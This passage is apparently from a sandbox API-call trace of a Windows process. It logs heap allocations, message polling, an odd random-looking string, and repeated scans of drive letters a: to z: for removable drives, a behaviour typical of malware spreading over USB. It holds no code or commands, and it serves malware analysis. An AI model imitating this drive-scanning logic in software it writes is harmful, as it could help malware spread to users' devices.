0x14bd340 [0212.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0212.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0212.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0212.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325dc0 | out: hHeap=0x12c0000) returned 1 [0212.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0212.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0212.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0212.182] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0212.182] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0212.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0212.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0212.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0212.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0212.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0212.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0212.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0212.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0212.184] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.184] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0212.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0212.184] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.184] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0212.184] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0212.184] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0212.185] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0212.185] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0212.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0212.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0212.185] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0212.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0212.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0212.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0212.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0212.185] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0212.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0212.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0212.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0212.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0212.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0212.185] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0212.185] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0212.186] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0212.186] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0212.186] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0212.186] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0212.186] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0212.187] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0212.187] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0212.187] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0212.187] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0212.187] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0212.188] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0212.188] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0212.188] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0212.188] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0212.188] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0212.189] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0212.189] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0212.195] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0212.195] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0212.195] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0212.195] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0212.195] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0212.196] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0212.196] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0212.196] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0212.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0212.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0212.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0212.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0212.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0212.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0212.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0212.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0212.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0212.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0212.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0212.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0212.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0212.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0212.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0212.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fe0 [0212.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0212.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0212.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0212.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0212.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fe0 | out: hHeap=0x12c0000) returned 1 [0212.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0212.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0212.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0212.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0212.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0212.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0212.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0212.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0212.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0212.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0212.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0212.198] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0212.198] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0212.198] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0212.198] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0212.198] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0212.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0212.198] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0212.198] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0212.198] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0212.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0212.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0212.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0212.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0212.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0212.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0212.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0212.198] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0212.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0212.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0212.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0212.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0212.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0212.199] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0212.199] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0212.199] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0212.199] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0212.200] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0212.201] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0212.201] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0212.201] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0212.201] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0212.202] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0212.202] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0212.202] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0212.202] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0212.203] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0212.203] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0212.203] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0212.203] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0212.203] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0212.204] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0212.204] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0212.204] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0212.204] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0212.204] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0212.205] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0212.205] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0212.208] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0212.208] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0212.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0212.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0212.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0212.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0212.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0212.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0212.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0212.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0212.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0212.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0212.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0212.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0212.209] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0212.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0212.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0212.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326080 [0212.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0212.209] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0212.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0212.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0212.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326080 | out: hHeap=0x12c0000) returned 1 [0212.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0212.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0212.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0212.210] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0212.210] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0212.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0212.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0212.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0212.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0212.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0212.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0212.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0212.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0212.335] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0212.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0212.335] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0212.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0212.335] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0212.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0212.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0212.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0212.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0212.336] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0212.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0212.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0212.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0212.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0212.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0212.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0212.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0212.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0212.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0212.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0212.336] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0212.336] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0212.337] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0212.337] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0212.337] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0212.337] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0212.338] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0212.338] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0212.338] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0212.338] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0212.339] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0212.339] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0212.339] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0212.339] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0212.339] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0212.340] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0212.340] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0212.340] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0212.340] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0212.340] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0212.340] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0212.341] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0212.341] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0212.341] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0212.341] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0212.342] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0212.342] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0212.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0212.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0212.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0212.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0212.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0212.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0212.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0212.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0212.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0212.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0212.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0212.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0212.343] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0212.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0212.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0212.343] 